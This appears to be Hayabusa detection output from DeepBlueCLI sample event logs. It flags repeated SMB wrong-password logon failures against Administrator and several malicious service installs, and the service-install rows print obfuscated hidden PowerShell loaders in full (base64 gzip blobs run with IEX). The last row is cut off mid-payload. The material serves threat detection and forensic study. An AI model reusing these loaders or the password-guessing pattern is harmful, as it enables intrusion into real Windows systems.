2016-09-20 01:52:47.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2yk62yREbgDCj9pB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.997 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6JPvkmaAsJlwn9t3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.034 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lhciP1zM9njlRI3j  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: duNDenwdo1oHVuoL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.114 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0ChBZOYkTm1SguA1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RU38tuiKC0weexmb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jg0Hp4xtz0pAMhCz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.231 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5AorVNz5MgTeEvn2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8oJ6tVjBxlYyj5ej  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oEAEOi0TsSRVPlz4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: USfEwKkH8OUADVds  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: y0jg1i6tDiInd10i  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Xv2jRzrgoP6lJdAJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.485 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LmuAXUwSkhR3tSRg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.535 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Zy4Fkpvcrlmp9AES  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 51ipUXvrRh0CPH1e  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5TB15XKzVJwIyjqU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.713 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: i1F6muFPBlPyHPbR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XNXwYS73RElHozUo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ft1MLPJISeq0bMsa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: i8kbFOwQiCyRVMDV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ToPzuDEmXN1fjIcS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pKF1QKEuTXIGnrx2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fyHpo6pX8TEo6ttv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:49.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3uYqEt90yr8B3rK9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:49.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2LKkrM0slVn0CKHw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:49.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TyJ82cfaddnc8c6D  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:49.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KJRw0S82SupmuS4Y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:49.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: z4lSo9BMWdcPLfLb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:49.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XreSLg472qhJw0R3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:49.266 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KIJcQJKLmnjrE2T9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:49.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zlddo3GCTEIkFyi9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:49.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hxiZoB5mHR2tGUFM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:49.399 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fpEbpiox2Q3Qf8av  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 05:36:09.147 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: zIGuwymOgHZnXZPm  :  Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6GWDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: DrzkXznQhkKgYssd  :  Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAKtM4FcCA71WbW/aSBD+3Er9D1aFhK0SDIQmTaRKt8YYCC8BHMxb0Wljr+2FxUvsdXjp9b/fGHBCrs0p1w9nJWLXM7P77DPP7NiNA1tQHkjr7Xy3qDfHSPr+4f27Lg7xUpIzD3VrxLSclFkX726swVp59w6sGda0R60/g60ufZXkKVqtdL7ENJhdX1fiMCSBOMzzNSJQFJHlPaMkkhXpL2nok5Cc3d7PiS2k71Lmz3yN8XvMjm7bCrZ9Ip2hwElsLW7jBF3eXDEq5Oy3b1llelac5asPMWaRnDW3kSDLvMNYVpF+KMmGd9sVkbNtaoc84q7ID2lwXsoPggi7pAOrPZI2ET53oqwCR4G/kIg4DKTnQyWrHHzkLAy7IbeR44QkgpB8I3jkCyJngpixnPSHPD1C6MeBoEsCdkFCvjJJ+EhtEuXrOHAY6RN3JnfIOj35W4Pk0yDw6opQyUFeXsPa5k7MyCE8q/yM9phQBZ6TpAIRPz68//DeTcUQ+3HR76L+qRZg9G66HxMAK3d5RPe+X6VCTmrDjljwcAvTzF0YE2UmTZNMTGczKYMnZu718GLqC56udlmDV1OLU2cGIccUZSK/tlt8CTbuTTUxv644nbg0IPo2wEtqp6KSf0U9cRnZnzafunUAm5w9GoijE0Y8LBIec9L057DqkoqnWC2mzCEhsiF9EaCCzCovwRxSI2cbQZssganDPAtpcEHKJPU+yneb7p7MwSlbYTiKclI3hlqyc5JJMCNOTkJBRI8mFAu+H2af4bZjJqiNI5EuN1P+Qedx2woPIhHGNuQQKLgzV8SmmCWM5KQ6dYi2NamXbp/9JR8VzBgNPFjpEfIBbxIeTJEoIwSkiQqUvElEY7liZAku+9I2GPagkI+VsFcS9oiTfQVnqvWDsBNiUkZOUEK2TcZFTrJoKOCi2JMMyvotECc3xCmcSkiO2ZHT8plqW5EIPvNwEbkjY3PbTbR6JGpPSyiAEiPkSw1H5KJsihAIkz+qt7SC4Bk3Ata2tQUtojUtNtrwP6DnDa5fOs2beV0N9Y3vokbUaNe7eq9eLz/emFZZmNWGaHYbol0dzecmqvcHYzFpoPodLSzG5d3qhu7MFnLGG/Vip+3WBW2zm3uOO9Zd17t0zX7xs0Fbw0pPK5RwS6/GraG21grlqErX9R4d9BY3hrgfWwwPXNUbFa8w3bTCuVXk7V0DoZp/bu9uXKvmt53tuK5eDcsLVEWoElQtQ+PNsRairmphz+Lr5rzGhl4FaYZNyaQ3MLRez9DQoDZ/0K9UD2JH2NeGVolOVqO+D3MDIDTVQrnhkB0f94CkGkfY64OPVynZvgs++iekferwqIQXGkca+BiTB8A1XhldBva7QYkji3VGGLUmW0NVi+NuGdULdFjzULIk9rQeRtGjvtPVouVwZ/i5M3ZVuCkvVb1yt7JdVVXXdb1pT4qbL7eXZa3wUFnSJbsvOerV4IsWrJte99FzesPL/qazvYf9BqpqfUz0AwLKiF2r3LjCV1E1PJHEa7d/G4eRjxlIBW70tHANHhrH67nLaRIhy889e0HCgDDoc9AJU9UjxriddIun2xy61aGHzKCABzA8L/1ypEhPjspzE0lfXV9PAC7U0pPM8y0SeMLPFTbnhQJ0g8KmXICjv/2cFb7ays/r5ZKWckrai83YfjMlqbgM3/Xsi0t+rv8PtB4r3ocf5y20Pr/7F+ubqC7kXpDxk/Xli//E/O9RMcRUgLsJtxcjh776OiNHTZ18jTxlDRTjHp/k4/A2Fmcd+FL5G8KtLTuVCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: TDhDnlnsrKrQVnjY  :  Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIALxR4FcCA7VWf2/aSBD9O5X6HawKCVslGAhpmkiVbo0xEDABHCCGotPGXpuFxUvs5Wev3/3GYDdUTar0pLMSseuZ2X375s2OvVXgCMoDaYltQ/r2/t1ZB4d4IckZl667NmZ2Tsp4wa7aLClnZ2DOrM1OoNXYcqTXpC+SPEbLpc4XmAaTm5vKKgxJII7zfI0IFEVk8cgoiWRF+kcaTklIzu8eZ8QR0jcp83e+xvgjZonbroKdKZHOUeDGthZ3cIwtby0ZFXL269esMj4vTvLVpxVmkZy1dpEgi7zLWFaRvivxhve7JZGzJnVCHnFP5Ic0uCjl+0GEPdKG1dbEJGLK3SirwGHgLyRiFQbS6bHidY5echaGnZA7yHVDEkFQvhGs+ZzImWDFWE76Sx4nIHqrQNAFAbsgIV9aJFxTh0T5Og5cRnrEm8htsknP/tYg+TQIvDoiVHKQnNfRmtxdMXJcIKv8ivdHXhV4nnMLbHx//+79Oy/VQ3TZs4K/69v1qShgdDY+jAkAljs8ogfnL1IhJ5mwJxY83ME0cx+uiDKRxnE+xpOJlGHuZTn3enwxdQbXPbl4uIR34wGn7gRiklRlvO4wWG/KmMbG13WnE48GRN8FeEGdVFryS/QTj5HDcfOpWxugydnEQFydMOJjETOZk8a/hlUXVPyI1VaUuSREDqQwAlSQXeVnMMfkyNlGYJIFMHWcZ+M0gKBJ6p2IeJfuHs/BKVthOIpyUmcFFeXkJItgRtychIKIJia0EvwwzD7DNVdMUAdHIl1uovxEZrJphQeRCFcOZBAIuLeWxKGYxXzkpDp1ibazqJ9unn2RjQpmjAY+rLSGbMCbmAVLxLoIAedBA0reIqKxWDKyAJ9DfRsM+1DNSTEchIR94mZfhJlK/ajrmJWUjhOQkGqLcZGTBjQUcFfEDB9U9d9AnFwTz3AqIUlSI6fFM9Z2IlZ7ZtrdOsOeE8s0YenASSiADyPkCw1H5FPZEiGwJX9Q72gFwWM3AmY62pwW0YYWGyb89+lFg+tXbvN2VldDfTv1UCNqmPWO3q3Xy+tba1AWVrUhmp2GMKsPs5mF6r2+LUYNVL+nhbld3i9v6d5qIdfeqp/22n5T0Lb7me96tu55/pVn9YqXBm0NK12tUMItvbpqDbWNVihHVbqpd2m/O781xKM9YLjvqf5D8RrTbSucDYrc3DcQqk0vnP2tN6hNTXdn19XrYXmOqghVgurA0HjT1kLUUQfYH/BNc1ZjQ7+CNMOhZNTtG1q3a2ioX5s96deqD7EPeKoNByU6Wj70pjA3AEJTLZQbLtlzuwsk1TjCfg98/ErJmXrgo39E2sc2j0p4rnGkgY8xegJc9tLoMLDf90scDVj7AaPWaGeoatHulFG9QIc1H8VLYl/rYhSt9b2uFgcud4eXbdtTBw/sStUr90vHU1V1U9ebzqi4/Xx3VdYKT5UFXbDHkqte9z9rwabpd9a+2x1e9bbt3SPs11fVwYdYOyCezGJ2vTSvTtTw2r1v4jCaYgYqgZs8LVeDh0ZyK3c4jSNk+dCt5yQMCIP2Bg0wVTpijDtxi3i+v6FHHTvHBIq2D8OL0osjRfrhqDw3jvTVzc0IoEL9JNrOt0jgi2musL0oFOD2L2zLBTjv209Y4cudnK6WixtIwtPJHuywhxLXVsaf96In1Pp/WUyKego/7ptYfH73G+ubmC3k0vP/Yvj5xR+x/McMDDEV4GnBzcTIsV3+hohEOSffGUmaQBde8sQffncrcd6GL5B/AQG25GNvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: aCshIvAdgRYNApEv  :  Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAFhX4FcCA71WbW/aSBD+nEr9D1aFhK06GAgpTaRKZwMGEkwAB/NWVG3stVlYvMRe89brf78x2Alpm1PuTjoL5N2dmZ3ZZ57ZsRv5NifMF8JS5PbH1o4I39+/O+ugAC0FMbMqtL2NLGR2YRiRzXLtDD3p7AwUMkHppjMozUbl/lr4IogTdbWqsiUi/vT6uhIFAfb5cZ6rY66GIV4+UIJDURL+FAYzHODzu4c5trnwXch8y9Upe0A0UdtVkD3DwrnqO7GsxWwUh5gzV5RwMfv1a1aanBemudpjhGgoZs1dyPEy51CalYQfUuzwfrfCYtYgdsBC5vLcgPgXxVzfD5GL27DbGhuYz5gTZiU4DPwCzKPAF06PFe9z1BKzMOwEzFYdJ8AhGOWa/potsJjxI0pl4Q9xkgTRi3xOlhjkHAdsZeJgTWwc5hrIdyjuYXcqtvEmPftbjcRTI9Dq8ECSIT2vR2swJ6L4uEFW+jXeY2YleH7KLuDx4/279+/clBjOPuw442HxlBcwOpscxhgiFjssJAfdL0JeFgxwijgLdjDN3AcRlqbCJE7IZDoFX/rF2Kk5V/pwKb++TSG1AQu/uPs8tIdG+I2CZGIx4kzBMklcZlbuGfH66wSsYpf4uLrz0ZLYKcfE3+UBuxQfTp1L1doQm5hNBNipYoo9xGNIZWHyq1ltSfiTrRYR6uBAtSGXIUQFaZZeBnPMkpht+gZeAmLHeRZS4gKzcaqdsHmXeo/noJStUBSGstCJoLRsWTAxotiRBdUPSSJSI84Ow+xzuEZEObFRyNPtplKKY+KvwvyQB5ENSYSz35srbBNEYyhkoUEcrO1M4qV+s78FooIoJb4HO60hEbASA2DymBqBI7+ggZQzMW8uVxQvQfVQ6jpFHhR2UhcHSiEPO9mfA00Jf2R3DEmKxUmYkGeTMi4LFgk43BgxvCec+k/BnNwch7AqAU7yI6aFNNF2PKZ+Jrpc9Kxi+T4mawLYAZ6AAzR6wJYaCvGnkskDAE78oNyRigrPqOlTw9YWpKBuSKFpwL9PLpqsWnZub+YNJahuZ67aDJtGo1PtNhql9Y1plbhZa/LbTpMbteF8bqqNXn/Ex021cU/yi1Fpv7ohe7OlOqOt8mmv7Td5bbufe447qrquV3bNXuFSJ61Bpavli6hVrUWtgbbR8qWwRjaNLul3Fzc6fxhZFPVdxRsWrhDZtoK5VWDGvqmq9dmFvb9xrfrMcHajhn